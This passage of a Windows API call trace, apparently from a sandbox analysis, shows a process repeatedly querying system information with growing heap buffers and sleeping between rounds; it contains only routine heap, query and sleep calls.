RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.474] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.475] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.476] Sleep (dwMilliseconds=0x110) [0203.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.505] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.506] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.506] Sleep (dwMilliseconds=0x110) [0203.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.521] Sleep (dwMilliseconds=0x110) [0203.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.528] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.533] Sleep (dwMilliseconds=0x110) [0203.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.550] Sleep (dwMilliseconds=0x110) [0203.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.568] Sleep (dwMilliseconds=0x110) [0203.591] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.591] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.596] Sleep (dwMilliseconds=0x110) [0203.634] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.634] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.635] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.635] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.635] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.636] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.636] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.636] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.637] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.637] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.637] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.637] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.643] Sleep (dwMilliseconds=0x110) [0203.666] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.666] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.667] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.667] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.667] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.667] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.668] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.668] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.669] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.676] Sleep (dwMilliseconds=0x110) [0203.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.692] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.694] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.694] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.695] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.695] Sleep (dwMilliseconds=0x110) [0203.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.706] Sleep (dwMilliseconds=0x110) [0203.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.723] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.724] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.724] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.725] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.725] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.726] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.726] Sleep (dwMilliseconds=0x110) [0203.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.755] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.756] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.756] Sleep (dwMilliseconds=0x110) [0203.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.785] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.786] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.786] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.787] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.788] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.788] Sleep (dwMilliseconds=0x110) [0203.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.832] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.833] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.834] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, 